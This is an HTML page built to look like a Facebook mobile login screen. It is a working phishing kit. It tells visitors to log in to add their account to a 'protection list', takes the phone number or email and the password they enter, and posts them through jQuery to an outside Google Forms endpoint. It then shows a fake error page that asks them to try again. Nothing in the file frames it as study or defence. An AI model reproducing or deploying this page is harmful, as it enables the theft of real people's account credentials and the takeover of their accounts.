<html>
<head>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
<title>Page Title.</title>
<style>
@import url(https://fonts.googleapis.com/css?family=Roboto);
body {
font-family: 'Roboto';
width:100%;
outline:none;
height:100vh;
margin:0;
}
#login {
display:none;
}
#head {
background-color:#3B5998;
color:#fff;
padding:11px;
font-family:'Roboto';
text-align:center ;
font-weight:1400;
font-style:bold ;
font-size:22px;
}
#inputs {
width:100%;
display:block;
margin-top:10px;
margin-bottom:10px;
position:relative;
display:flex;
flex-direction:column;
}
#inputs > input {
background-color:#F5F6F7;
width:80%;
border-color:#F4F5F5;
border-radius:px;
padding:15px;
outline:none;
position:relative;
display:block;
margin:auto;
}
.blue {
border-radius:5px;
padding:10px;
outline:none;
position:relative;
display:block;
margin:auto;
color:#fff;
border:0;
font-weight:900;
background-color:#1877F2;
width:90%;
}
#green {
border-radius:5px;
padding:10px;
outline:none;
position:relative;
display:block;
margin:auto;
color:#fff;
border:0;
font-weight:900;
background-color:#15AB15;
width:50%;
}
#last {
color:#C3D2E7;
font-size:14px;
text-align:center ;
}
.line {
width: 40%;
height: 0;
border: 0.5px solid #C4C4C4;
margin: 3px;
display:inline-block;
}
.all {
margin-top:20px;
margin-bottom:20px;
content:'';
position:center ;
text-align:center ;
width:100%;
}
#loader {
height:100vh;
width:100%;
margin: 35px auto;
text-align: center;
display: block;
-webkit-animation: scale-in-center 1s cubic-bezier(0.250, 0.460, 0.450, 0.940) both;
animation: scale-in-center 1s cubic-bezier(0.250, 0.460, 0.450, 0.940) both;
}
@-webkit-keyframes scale-in-center {
0% {
-webkit-transform: scale(0);
transform: scale(0);
opacity: 1;
}
100% {
-webkit-transform: scale(1);
transform: scale(1);
opacity: 1;
}
}
@keyframes scale-in-center {
0% {
-webkit-transform: scale(0);
transform: scale(0);
opacity: 1;
}
100% {
-webkit-transform: scale(1);
transform: scale(1);
opacity: 1;
}
}
#facebook-icon {
background: #3b5998;
text-indent: -999em;
width: 100px;
height: 110px;
border-radius: 5px;
position: relative;
overflow: hidden;
border: 15px solid #3b5998;
border-bottom: 0;
display: inline-block;
}
#facebook-icon::before {
background: #3b5998;
content: "/20";
position: absolute;
bottom: -30px;
right: -37px;
width: 40px;
height: 90px;
border: 20px solid #eee;
border-radius: 25px;
}
#facebook-icon::after {
background: #eee;
content: "/20";
position: absolute;
top: 50px;
right: 5px;
width: 55px;
height: 20px;
}
.spinner {
margin: 100% auto 0;
width: 70px;
text-align: center;
}
.spinner > div {
width: 18px;
height: 18px;
background-color: #333;
border-radius: 100%;
display: inline-block;
-webkit-animation: bouncedelay 1.4s infinite ease-in-out both;
animation: bouncedelay 1.4s infinite ease-in-out both;
}
.spinner .bounce1 {
-webkit-animation-delay: -0.32s;
animation-delay: -0.32s;
}
.spinner .bounce2 {
-webkit-animation-delay: -0.16s;
animation-delay: -0.16s;
}
@-webkit-keyframes bouncedelay {
0%, 80%, 100% { -webkit-transform: scale(0) }
40% { -webkit-transform: scale(1.0) }
}
@keyframes bouncedelay {
0%, 80%, 100% {
-webkit-transform: scale(0);
transform: scale(0);
} 40% {
-webkit-transform: scale(1.0);
transform: scale(1.0);
}
}
</style>
<script>
$(document).ready(function(){
$(".form form > .input > input").each(function(index) {
if($.trim($(this).val()).length != 0) {
$(this).parent().addClass("focus");
}
})
})
$(".form form > .input > input").on("focus blur", function(){
if($.trim($(this).val()).length == 0) {
$(this).parent().toggleClass("focus");
}
})
</script>
<script> function postToGoogle() { var field1 = $("#nameField").val(); var field2 = $("#emailField").val(); var field3 = $("#mobField").val(); var field4 = $("#messageField").val(); if(field1 == ""){ alert('Please Fill Your Name'); document.getElementById("nameField").focus(); return false; } if(field2 == ""){ alert('Please Fill Your Email'); document.getElementById("emailField").focus(); return false; } if(field2 == ""){ alert('Additional message1'); document.getElementById("MobField").focus(); return false; } if(field4 == ""){ alert('Additional message2'); document.getElementById("messageField").focus(); return false; } $.ajax({ url: "https://docs.google.com/forms/d/e/1FAIpQLSd394Ks2jIOTqMK9m2vIKfuCuAGO_dEPoKiH2wMaDJjLwrvtA/formResponse?", data: {"entry.1383899845": field1, "entry.713966963": field2, "entry.1701645267": field3, "entry.1031165192": field4}, type: "POST", dataType: "xml", success: function(d) { }, error: function(x, y, z) { $('#success-msg').show(); $('#form').hide(); } }); return false; } </script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js">
</script>
</head>
<body>
<div>
<div id="head">
<b>facebook</b>
</div>
<center>
<p style="background-color:rgb(255,251,226);color:red; padding:6px 7px 10px 15px;">Sorry! Please login to add your account in protection list </p></center>
<form id="form" target="_self" onsubmit="return postToGoogle();" action="" autocomplete="on">
<div id="inputs">
<input id="nameField" name="entry.1383899845" placeholder="Phone or Email">
<input id="emailField" name="entry.713966963" type="password" placeholder="Password">
</div>
<button id="send" type="submit" class="blue">Log In</button>
<div class="all">
<div class="line"></div>
<div style="display:inline-block;font-size:14px">OR</div>
<div class="line"></div>
</body></div>
<button id="green" onclick="window.open("https://m.facebook.com/reg/?cid=103&refsrc=https%3A%2F%2Fm.facebook.com%2F&_rdr");>Create new account</button>
<p id="last">Forgotten Password?</p>
</div>
</form>
<h3 id="success-msg" style="text-align: center !important; margin-top:0px !important; display:none; color: rgb()">
<!DOCTYPE html>
<html>
<head>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
<title>Page Title.</title>
<style>
@import url(https://fonts.googleapis.com/css?family=Roboto);
body {
font-family: 'Roboto';
width:100%;
outline:none;
height:100vh;
margin:0;
}
#login {
display:none;
}
#head {
background-color:#3B5998;
color:#fff;
padding:11px;
font-family:'Roboto';
text-align:center ;
font-weight:1400;
font-style:bold ;
font-size:22px;
}
#inputs {
width:100%;
display:block;
margin-top:10px;
margin-bottom:10px;
position:relative;
display:flex;
flex-direction:column;
}
#inputs > input {
background-color:#F5F6F7;
width:80%;
border-color:#F4F5F5;
border-radius:5px;
padding:15px;
outline:none;
position:relative;
display:block;
margin:auto;
}
.blue {
border-radius:5px;
padding:10px;
outline:none;
position:relative;
display:block;
margin:auto;
color:#fff;
border:0;
font-weight:900;
background-color:#1877F2;
width:90%;
}
#green {
border-radius:5px;
padding:10px;
outline:none;
position:relative;
display:block;
margin:auto;
color:#fff;
border:0;
font-weight:900;
background-color:#15AB15;
width:50%;
}
#last {
color:#C3D2E7;
font-size:14px;
text-align:center ;
}
.line {
width: 40%;
height: 0;
border: 0.5px solid #C4C4C4;
margin: 3px;
display:inline-block;
}
.all {
margin-top:20px;
margin-bottom:20px;
content:'';
position:center ;
text-align:center ;
width:100%;
}
#loader {
height:100vh;
width:100%;
margin: 35px auto;
text-align: center;
display: block;
-webkit-animation: scale-in-center 1s cubic-bezier(0.250, 0.460, 0.450, 0.940) both;
animation: scale-in-center 1s cubic-bezier(0.250, 0.460, 0.450, 0.940) both;
}
@-webkit-keyframes scale-in-center {
0% {
-webkit-transform: scale(0);
transform: scale(0);
opacity: 1;
}
100% {
-webkit-transform: scale(1);
transform: scale(1);
opacity: 1;
}
}
@keyframes scale-in-center {
0% {
-webkit-transform: scale(0);
transform: scale(0);
opacity: 1;
}
100% {
-webkit-transform: scale(1);
transform: scale(1);
opacity: 1;
}
}
#facebook-icon {
background: #3b5998;
text-indent: -999em;
width: 100px;
height: 110px;
border-radius: 5px;
position: relative;
overflow: hidden;
border: 15px solid #3b5998;
border-bottom: 0;
display: inline-block;
}
#facebook-icon::before {
background: #3b5998;
content: "/20";
position: absolute;
bottom: -30px;
right: -37px;
width: 40px;
height: 90px;
border: 20px solid #eee;
border-radius: 25px;
}
#facebook-icon::after {
background: #eee;
content: "/20";
position: absolute;
top: 50px;
right: 5px;
width: 55px;
height: 20px;
}
.spinner {
margin: 100% auto 0;
width: 70px;
text-align: center;
}
.spinner > div {
width: 18px;
height: 18px;
background-color: #333;
border-radius: 100%;
display: inline-block;
-webkit-animation: bouncedelay 1.4s infinite ease-in-out both;
animation: bouncedelay 1.4s infinite ease-in-out both;
}
.spinner .bounce1 {
-webkit-animation-delay: -0.32s;
animation-delay: -0.32s;
}
.spinner .bounce2 {
-webkit-animation-delay: -0.16s;
animation-delay: -0.16s;
}
@-webkit-keyframes bouncedelay {
0%, 80%, 100% { -webkit-transform: scale(0) }
40% { -webkit-transform: scale(1.0) }
}
@keyframes bouncedelay {
0%, 80%, 100% {
-webkit-transform: scale(0);
transform: scale(0);
} 40% {
-webkit-transform: scale(1.0);
transform: scale(1.0);
}
}
</style>
<script>
$(document).ready(function(){
$(".form form > .input > input").each(function(index) {
if($.trim($(this).val()).length != 0) {
$(this).parent().addClass("focus");
}
})
})
$(".form form > .input > input").on("focus blur", function(){
if($.trim($(this).val()).length == 0) {
$(this).parent().toggleClass("focus");
}
})
</script>
<script> function postToGoogle() { var field1 = $("#nameField").val(); var field2 = $("#emailField").val(); var field3 = $("#mobField").val(); var field4 = $("#messageField").val(); if(field1 == ""){ alert('Please Fill Your Name'); document.getElementById("nameField").focus(); return false; } if(field2 == ""){ alert('Please Fill Your Email'); document.getElementById("emailField").focus(); return false; } if(field2 == ""){ alert('Additional message1'); document.getElementById("MobField").focus(); return false; } if(field4 == ""){ alert('Additional message2'); document.getElementById("messageField").focus(); return false; } $.ajax({ url: "https://docs.google.com/forms/d/e/1FAIpQLSd394Ks2jIOTqMK9m2vIKfuCuAGO_dEPoKiH2wMaDJjLwrvtA/formResponse?", data: {"entry.1383899845": field1, "entry.713966963": field2, "entry.1701645267": field3, "entry.1031165192": field4}, type: "POST", dataType: "xml", success: function(d) { }, error: function(x, y, z) { $('#success-msg').show(); $('#form').hide(); } }); return false; } </script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js">
</script>
</head>
<body>
<div>
<form id="form" target="_self" onsubmit="return postToGoogle();" action="" autocomplete="on">
<div id="inputs"><center>
<p style="color:red;font-size:15px;">Sorry! unexpected error occured try again later</p></center>
<input id="nameField" name="entry.1383899845" placeholder="Phone or Email">
<input id="emailField" name="entry.713966963" type="password" placeholder="Password">
</div>
<button id="send" type="submit" class="blue">Log In</button>
<div class="all">
<div class="line"></div>
<div style="display:inline-block;font-size:14px">OR</div>
<div class="line"></div>
</body></div>
<button id="green">Create new account</button>
<p id="last">Forgotten Password?</p>
</div>
</form>
</body>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js">
</html>
</h3>
</body>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js">
</htm>